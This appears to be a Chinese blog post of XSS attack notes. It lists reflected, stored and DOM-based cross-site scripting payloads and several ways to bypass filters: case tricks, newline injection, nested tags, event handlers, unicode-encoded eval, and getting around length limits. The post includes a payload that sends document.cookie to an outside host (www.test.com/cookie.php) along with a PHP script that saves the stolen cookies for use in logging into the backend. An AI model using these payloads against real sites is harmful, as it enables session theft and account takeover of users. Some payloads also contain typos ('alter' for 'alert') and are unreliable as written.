• XSS攻击

    XSS攻击

    点击查看代码 
    <script>alert('xss')</script>
<script>alert(document.cookie)</script>  #显示出cookie信息
<script>document.location='http://www.test.com/cookie.php?cookie='+document.cookie;</script>  需要进行URL编码
# cookie.php   反射型XSS获取cookie,登录后台
<?php
$cookie = $_GET['cookie'];
file_put_contents("cookie.txt",$cookie);

    存储型xss漏洞,数据写入数据库中,利用img标签,如果出现损坏的小图标,就说明存在存储型xss漏洞
    <img src=1 onerror = alter'1'> 如果前面的src=1没有正常执行,就会调用onerror = '111'

    • 无法使用<>:以下三行代码可在<>里面写
      onclick=alter(1)// 点击后触发
      Onmousemove 当鼠标移动就触发 Onmousemove=alter(1)
      Onload 当页面加载完成后触发
    • 将on、script等字符分割:
      <a href=javascript:alert(1)>Clickme</a> 需要先闭合<>、""这些
    • 将on、script等以及href字符分割:更改大小写看是否可行
    • 过滤比较多:可以使用unicode编码形式绕过
      基于DOM的XSS
      基于DOM文档对象模型漏洞的一种攻击方式,不依赖于服务器端的数据,而从客户端获得DOM中的数据并在本地执行。
      通过JS脚本对文档对象进行编辑从而修改页面中的元素。
      url+#javascript:alert(1) javascript伪协议
      判断是否存在DOM型XSS的关键是观察我们的HTML源代码中是否存在相关的js函数
      location.hash
      location.href
      innerHTML
      document.write
      eval("var x = "'+location.hash + ""');
      localStorge、SessionStorge、Cookies

    利用与绕过

    • 大小写绕过

    这个绕过方式的出现是因为网站仅仅只过滤了<script>标签,而没有考虑标签中的大小写并不影响浏览器的解释所致。

    • %0A绕过

      换行符没有过滤,使用%0A进行绕过

    http://www.zixem.altervista.org/XSS/3.php?name=zxm%0A<script>alert("1337");</script>

    • 利用过滤后返回语句再次构成攻击语句来绕过

    我们直接敲入script标签发现返回的网页代码中script标签被去除了,但其余的内容并没有改变。
    这个利用原理在于只过滤了一个script标签。例如:scscriptript

    • 并不是只有script标签才可以插入代码

      例如这里我们用标签做一个示范。

      我们利用如下方式:
      `

      [http://192.168.1.102/xss/example4.php?name=
      src='w.123' onerror='alert("hey!")'>
      `
      就可以再次愉快的弹窗。原因很简单,我们指定的图片地址根本不存在也就是一定会发生错误,这时候onerror里面的代码自然就得到了执行。

      以下列举几个常用的可插入代码的标签。

      <a onmousemove=’do something here’>

      当用户鼠标移动时即可运行代码

      <div onmouseover=‘do something here’>

      当用户鼠标在这个块上面时即可运行(可以配合weight等参数将div覆盖页面,鼠标不划过都不行)

      类似的还有onclick,这个要点击后才能运行代码,条件相对苛刻,就不再详述。

      编码脚本代码绕过关键字过滤

      有的时候,服务器往往会对代码中的关键字(如alert)进行过滤,这个时候我们可以尝试将关键字进行编码后再插入,不过直接显示编码是不能被浏览器执行的,我们可以用另一个语句eval()来实现。eval()会将编码过的语句解码后再执行,简直太贴心了。

      例如alert(1)编码过后就是

      \u0061\u006c\u0065\u0072\u0074(1)

eval()函数:可计算字符串,并执行其中的javaScript代码
<script>eval("alert('xss')");</script>
可以使用\连接十六进制字符串,然后使用eval()函数执行十六进制字符串形式的脚本

    • 主动闭合标签实现注入代码

      这个时候就要我们手动闭合掉两个双引号来实现攻击,别忘了,javascript是一个弱类型的编程语言,变量的类型往往并没有明确定义。

    • 绕过长度限制

      假设下面代码存在一个XSS漏洞:

    <input type = text value='$var'/>

    服务器端对输出变量$var做了严格的长度限制,那么攻击者可能会这样构造XSS:

    $var='><script>alter(/xss/)</script>'

    希望达到的输出效果是:

    <input type=text value=''><script>alter(/xss/)</script>'/>

    假设长度限制为20个字节,则这段xss会被切割为

    $var输出为:'><script>alter(/xss

    $var='onclick =alter(1)//

         -  可用注释符绕过长度限制   ><!-- -->
  • 相关阅读:
    css报模块没找到 分析思路 从后往前找,先定位最后blue.less 解决:iview升级4.0 css没改导致编译不过去
    将config从内部移动到外部 3部曲
    iviewadmin url 加入 Router base #viewDesignAdmin
    phpStudy
    rimraf node_modules 突然不能用了 怀疑是yarn的问题,从环境变量将yarn删掉,能用了
    this.current = params.page || 1 (前提是params对象一定要存在)
    onOK Modal.warning iview 要写一个函数 套上,不然会得不到异步调用,直接弹出的时候就执行了
    ant-design-pro 如何打包成 本地html,双击即可查看
    iview mock main.js
    svelte & Polymer Project
  • 原文地址:https://www.cnblogs.com/levelstrcpy/p/15810527.html
Copyright © 2020-2023  润新知